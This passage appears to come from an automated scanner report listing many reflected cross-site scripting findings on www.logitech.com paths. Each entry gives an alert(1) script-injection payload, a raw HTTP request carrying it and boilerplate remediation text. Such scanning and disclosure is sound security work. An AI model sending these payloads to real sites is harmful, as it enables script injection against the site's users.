Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v271762</script><script>alert(1)</script>66404c841c9/cmn/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e20b5</script><script>alert(1)</script>afe9612d410 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmne20b5</script><script>alert(1)</script>afe9612d410/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02b2"><script>alert(1)</script>d454d22a12c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmnf02b2"><script>alert(1)</script>d454d22a12c/lib/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 829a7"><script>alert(1)</script>f50f7b3156e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/lib829a7"><script>alert(1)</script>f50f7b3156e/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d0a6</script><script>alert(1)</script>2a21864590f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib3d0a6</script><script>alert(1)</script>2a21864590f/plugins/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b233c"><script>alert(1)</script>59e1d5a4e78 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/lib/pluginsb233c"><script>alert(1)</script>59e1d5a4e78/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7081</script><script>alert(1)</script>38f0c4eaeeb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/pluginsf7081</script><script>alert(1)</script>38f0c4eaeeb/third-party/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205e2"><script>alert(1)</script>39561b3dd1e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /javascript/v2/cmn/lib/plugins/third-party205e2"><script>alert(1)</script>39561b3dd1e/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 618aa</script><script>alert(1)</script>f5f61d89fa3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/plugins/third-party618aa</script><script>alert(1)</script>f5f61d89fa3/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f74c</script><script>alert(1)</script>0b2b09cc90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f077"><script>alert(1)</script>81a0e93c63b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9a8f"><script>alert(1)</script>e5ea1365cf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a15a</script><script>alert(1)</script>866c8f0224f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73d74"><script>alert(1)</script>2aeaad9a56b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31c60</script><script>alert(1)</script>e675c2ee5bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload debce</script><script>alert(1)</script>49dc6699466 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6bf8"><script>alert(1)</script>3d409760fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d15b2"><script>alert(1)</script>e2aa014592e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d51</script><script>alert(1)</script>2f5dc0edd7a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a94af</script><script>alert(1)</script>69a2cde5720 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40438"><script>alert(1)</script>602b3b2d713 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46915"><script>alert(1)</script>a2135d21ebe was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13f9d</script><script>alert(1)</script>f41df9c99fe was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e4b"><script>alert(1)</script>e1c6431b20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e92e5</script><script>alert(1)</script>02e0a3c6f93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2972</script><script>alert(1)</script>46f5fa7ae8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbb9"><script>alert(1)</script>00d6fe09e8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed25"><script>alert(1)</script>f32e073d482 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f86a9</script><script>alert(1)</script>57219893e48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de511</script><script>alert(1)</script>1fc05f76bce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 554a6"><script>alert(1)</script>cfaa5467cf5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee7d3</script><script>alert(1)</script>aa2ccd63908 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f6f"><script>alert(1)</script>63cb1c81296 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae06</script><script>alert(1)</script>c3a7f0303db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbcdb"><script>alert(1)</script>36dc8139835 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc83"><script>alert(1)</script>5ae84189aab was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a51</script><script>alert(1)</script>a291f5f91dd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca9aa"><script>alert(1)</script>e919ea1a201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascriptca9aa"><script>alert(1)</script>e919ea1a201/v2/cmn/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25b3a</script><script>alert(1)</script>8d8bc81d117 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript25b3a</script><script>alert(1)</script>8d8bc81d117/v2/cmn/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a490</script><script>alert(1)</script>64b382eb8e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v29a490</script><script>alert(1)</script>64b382eb8e7/cmn/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcbb"><script>alert(1)</script>0dc9c08c69d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v24bcbb"><script>alert(1)</script>0dc9c08c69d/cmn/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d53</script><script>alert(1)</script>c4a21c5cb27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmnc0d53</script><script>alert(1)</script>c4a21c5cb27/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96c0"><script>alert(1)</script>a91d6e3b03b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/cmnd96c0"><script>alert(1)</script>a91d6e3b03b/lib/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc4f2"><script>alert(1)</script>20935100964 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /javascript/v2/cmn/libdc4f2"><script>alert(1)</script>20935100964/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 873cd</script><script>alert(1)</script>be7f4ac97a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib873cd</script><script>alert(1)</script>be7f4ac97a1/plugins/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87c48</script><script>alert(1)</script>f7a9a4c6764 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /javascript/v2/cmn/lib/plugins87c48</script><script>alert(1)</script>f7a9a4c6764/third-party/jquery.form.js HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:56 GMT Connection: close
